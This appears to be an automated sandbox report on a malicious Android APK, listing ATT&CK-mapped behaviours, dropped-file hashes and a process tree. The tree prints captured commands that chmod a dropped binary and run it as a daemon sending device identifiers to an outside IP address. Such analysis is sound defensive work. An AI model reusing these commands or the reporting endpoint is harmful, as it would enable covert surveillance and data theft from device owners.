20aa76d0ac26bae74c91dd201cc77e0f7df96f3caaa66f759c139a875c182b73

Analysis

max time kernel
7s
max time network
131s
platform
android_x86
resource
android-x86-arm-20240624-en
resource tags

androidarch:armarch:x86image:android-x86-arm-20240624-enlocale:en-usos:android-9-x86system
submitted
28-09-2024 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fc604371b148edaf929e4e7bcfde80d0_JaffaCakes118.apk
Size

17.6MB
MD5

fc604371b148edaf929e4e7bcfde80d0
SHA1

af6d04f6628a09d47c5f174fa7de8520372c3f22
SHA256

20aa76d0ac26bae74c91dd201cc77e0f7df96f3caaa66f759c139a875c182b73
SHA512

b89e5368718142dd4840df45fd898c4d4a5b03673bf16987804d29713275a973b8828aa1421824290b3b3583f1eb8d2257b38b2a97cccacc5cc05c90b805bfff
SSDEEP

393216:b3wQSGKI2sAQdO+ORY5TTVdLomg/U/r2eCZMraNiPcdByoU2GCUFgZti5Jk/WWXr:bgQGI/dDZK/gTrra+4RxFWW4ra

Score

7^/10

discovery evasion impact persistence

Malware Config

Signatures

Loads dropped Dex/Jar 1 TTPs 3 IoCs

Runs executable file dropped to the device during analysis.

evasion

Download New Code at Runtime

T1407

ioc	pid	Process
/storage/emulated/0/Android/data/com.vܚ.ݢᴦt.wbt䀀/NLeݮzip	4258	com.pitaya.diaw
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip	4293	/system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip --output-vdex-fd=47 --oat-fd=48 --oat-location=/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/oat/x86/mqywh.odex --compiler-filter=quicken --class-loader-context=&
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip	4258	com.pitaya.diaw

Domain associated with commercial stalkerware software, includes indicators from echap.eu.org 1 IoCs

flow	ioc
4	alog.umeng.com

Queries information about active data network 1 TTPs 1 IoCs

discovery

System Network Connections Discovery

T1421

description	ioc	Process
Framework service call	android.net.IConnectivityManager.getActiveNetworkInfo	com.pitaya.diaw

Queries information about the current Wi-Fi connection 1 TTPs 1 IoCs

Application may abuse the framework's APIs to collect information about the current Wi-Fi connection.

discovery

System Network Connections Discovery

T1421

description	ioc	Process
Framework service call	android.net.wifi.IWifiManager.getConnectionInfo	com.pitaya.diaw

Registers a broadcast receiver at runtime (usually for listening for system events) 1 TTPs 1 IoCs

persistence

Broadcast Receivers

T1624.001

description	ioc	Process
Framework service call	android.app.IActivityManager.registerReceiver	com.pitaya.diaw

Uses Crypto APIs (Might try to encrypt user data) 1 TTPs 1 IoCs

impact

Data Encrypted for Impact

T1471

description	ioc	Process
Framework API call	javax.crypto.Cipher.doFinal	com.pitaya.diaw

Checks CPU information 2 TTPs 1 IoCs

System Checks

T1633.001

System Information Discovery

T1426

description	ioc	Process
File opened for read	/proc/cpuinfo	com.pitaya.diaw

com.pitaya.diaw
1⤵
- Loads dropped Dex/Jar
- Queries information about active data network
- Queries information about the current Wi-Fi connection
- Registers a broadcast receiver at runtime (usually for listening for system events)
- Uses Crypto APIs (Might try to encrypt user data)
- Checks CPU information
PID:4258
- /system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip --output-vdex-fd=47 --oat-fd=48 --oat-location=/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/oat/x86/mqywh.odex --compiler-filter=quicken --class-loader-context=&
  2⤵
  - Loads dropped Dex/Jar
  PID:4293
- chmod 777 /data/data/com.pitaya.diaw/rosacb
  2⤵
  PID:4337
- /system/bin/ndk_translation_program_runner_binfmt_misc /data/data/com.pitaya.diaw/rosacb /data/data/com.pitaya.diaw/rosacb -p com.pitaya.diaw -r am startservice --user 0 -n com.pitaya.diaw/ic.hqywo.cwon -e key daemon -h http://52.11.99.233:7123/report/allData -m sign=unkonw&imeiNo=&v=1.1.2&imei=358240051014041&location=unKnow&operator=310260&l=en&device={"name":"walleye","model":"Pixel2","os":"9"}&data=[{"bt":6}]&rcode=1&sqlid=1 -i 4258
  2⤵
  PID:4357

Network

MITRE ATT&CK Mobile v15

Initial Access

Execution

Persistence

Event Triggered Execution

T1624

Broadcast Receivers

T1624.001

Privilege Escalation

Defense Evasion

Download New Code at Runtime

T1407

Virtualization/Sandbox Evasion

T1633

System Checks

T1633.001

Credential Access

Discovery

System Information Discovery

T1426

System Network Connections Discovery

T1421

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Encrypted for Impact

T1471

Replay Monitor

Loading Replay Monitor...

Downloads

/data/data/com.pitaya.diaw/daemon.t.tmp

Filesize
26KB

MD5
3f365c54edfd1b85d096030d8852a65b

SHA1
171596cc1468dff604a998a0df2d86fddad51a3d

SHA256
e8b60842d13897036fe7ac07cd0b953bd05029ce45cd4bb3694717e68d2bd93d

SHA512
0c14a6ad044bf5fff1d63635d1dfa8e12e685a3b70366b523eb1050bb1c16a309817c94c174e2a8ad7bba147eec2de9f97ae6813e07389834fc7271f493e3339

Download Submit
/data/data/com.pitaya.diaw/files/mobclick_agent_cached_com.pitaya.diaw

Filesize
1005B

MD5
606bbbafffc084aa38cda3f13398d600

SHA1
32b60fe85b0b5ac30408d54fce5ea435f2ca5d30

SHA256
14d630dd4df636a7115a4303fd564c0560f9dbca8ff8ed83f7739635df221b60

SHA512
1b0664286900a91453056880bfec30def9b131b1b5f5d5d7345e9bca2e3ff6a094c37e80e05cbc83a862cc382a1fa6fc73cfeaa639e8bdf07214c8b52377432a

Download Submit
/data/data/com.pitaya.diaw/files/nials

Filesize
57KB

MD5
5564c2f6a69d05d3ba320e38311dd9c0

SHA1
88be2c52452f98e83dacb058eb9e2417249c9353

SHA256
710136e8be8dcf183dfdca0d346ed6ec24b2b3d03f97594bb4dd7149cadbbddd

SHA512
7ac67cfb09763277025e2ee816764350eb06de58005a5c391115c537116fec8c8ffd2d0b041349f1ff11b6ac7d7164ff762b092890805f699cec5c9e896ad31f

Download Submit
/data/data/com.pitaya.diaw/files/userData.txt

Filesize
35B

MD5
98840500cb0d9e8a7b3be209c2da78be

SHA1
3ff13ceb5c006fb7ce252e37c00ef4bde3388c82

SHA256
07b9438c2895245d7b01f700587e41c2dd29856670328693a665cedd2c76ddf7

SHA512
68da35bb3bc0dd4e49e106e748e51128881beb514d42ce9e63d24034140ea29017ebf977d0f76c5da5aa745c0f9386ac9fe475032ba5cadd6cbf4cf84d364406

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqoggshg/6CF5994272536C52A0B7E9B191A34205.apk

Filesize
255KB

MD5
678e793a60d6eb909d5672c4ee8e3da4

SHA1
2a87e630066614f884a3ad9b77b145ca11b755f9

SHA256
256035304aaf310ce73f7a86a6228ad00a2dc9f807ea5524205d88d487570db6

SHA512
51ac6f4f3fb4e6c893dc28c6a80c29cf0c7a425c1931e061067cbbd2d68c5250480061ab221f7a94c327eac8c1b99b00f80ec5963abcdc5d957c200972002cfc

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh

Filesize
529KB

MD5
06f99e88aa658b5eb078649a8df527c7

SHA1
e9a091223d490029991a1a6cd6043a052defbf89

SHA256
1364a33b803fc8d580f582e4b0ad87eb4bfb8a608b732e6d974f99d5ea4ea8b6

SHA512
9a297c4bf09fee87a8cdca06259511f28961a34555e1f2f67f95ee98a111413011a4460bc6cbaa9fcbe6bff04e91ae18f4e415a59108a12ee7f03ad15f726905

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip

Filesize
537KB

MD5
54cd4f4cfda9d8eff5ccd29db652047e

SHA1
74cab60f4f7294bc95be82d9698057e69d59a42f

SHA256
3efb577c44ac0f37f970fad2d72b5f462b9b17c2e26233e6f6d6ec717ceff4d6

SHA512
c2ae5cec15f81d4e9b36f0c876dcc9e2bccfcec9c2d5c9a0baa6fa54050723cba4561f7637a7cc0da1fb90a71b3e3dbaaa144a6340b99938264733d1876e4cb5

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip

Filesize
657KB

MD5
0394519e2e3b324f0093ae4880dcc2a8

SHA1
0f530ebf5f363a4c0dd95b8a97717bf1f5f64a8a

SHA256
1682586f848fd424bb60c41c275d6bb454a99ac6c63a26e350e1a06460e0f4f2

SHA512
6c7b8ac35d89b7ddd48b753b52e599d91d611c0e654157232cfe59deda384195520fa00cb113740100a9ac02dff15af3360be01287ca53b428343971266fd12d

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/mqywh.zip

Filesize
657KB

MD5
a1bb4e71d0c5237c3aa0d5e87238d38e

SHA1
a200d40958d6491491e87f9e41f2b88f238a0483

SHA256
ba17180ad9e571d6a4f8b9240439768db54f92a7992074c679b2c956d91795ca

SHA512
bc0e1326001cf193f73328001ae148e39c08bb9281f4caff7575177e140e1cbda94a5b814e47e2044ddd4fff1b32a4b3668e5048261bff87ab99810d2ba8f12b

Download Submit
/storage/emulated/0/Android/data/com.qca.dwhomo.rwok/rosacb

Filesize
26KB

MD5
a16377b2826c263e14891e7252cc5fb2

SHA1
2bfb0357b939ae9dcdd682ca8b0e19edb01ecd78

SHA256
4e136d90b41190c44a2a60f531d90a1a10879e27257b516f41bd3e657a950828

SHA512
5fe66af6f93ae941d82e7d484e602a16cde9a2c6223faaaa756e4c81aa83856b02c56853ff36ecd3284af966ee1bfb3c4ffbe44418fc165b61e427ef9bef57e1

Download Submit
/storage/emulated/0/Android/data/com.vܚ.ݢᴦt.wbt䀀/NLe݀

Filesize
572KB

MD5
4452f69005887960fa31ab4a9cd375b1

SHA1
05a4812f61778aa1d1cce0fa2d27577664e3a8ef

SHA256
c9ba1572906caff0052a499bdab2bfcccb5bdd6667d32d9062d43b8b2f80a002

SHA512
df5aa5de67bd307c83109af5afb7d669993aad6ce1ac9f195a44591fe30fe23bc2e9bead291d472aecdaad849e9d7fa24e923f7b5be26c6392690dd66881b94d

Download Submit
/storage/emulated/0/Android/data/com.vܚ.ݢᴦt.wbt䀀/NLeݮzip

Filesize
572KB

MD5
2300bd198bb616fc6bc48c36c10d8a2a

SHA1
0770371f1a37bb90790b849466895a52f07bd808

SHA256
03505b6eea861d515e6aa58b5b67fe374b849be76690c93fab2eae2a81391bb6

SHA512
3281b2e5682865e65816885749ea39fecdf149001312889b766067ace6214fcf0ddccab8337eb7a417d1df904795d0801b3704e3c173d6d439a1c3dc693d1dfe

Download Submit
/storage/emulated/0/Android/data/com.vܚ.ݢᴦt.wbt䀀/NLeݮzip

Filesize
48KB

MD5
910155abf3e7b913ce9ec664b732375a

SHA1
b58ff549a78e02219f4122d98f25c2a76223ac7e

SHA256
4392ce0ed8cce04f12e6c92ed5c06b56b2cf2240c159f40aa982ba292521c7bd

SHA512
fd720aec27d2a29edaf6b9ee275c2608b357b3e9690dd3c2d64e5a600e0d6568ecee3e011d3c7e7d5b4be7636db398abe5af30e06ccf6abc44ff9422f00031f8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Mobile v15

Replay Monitor

Loading Replay Monitor...

Downloads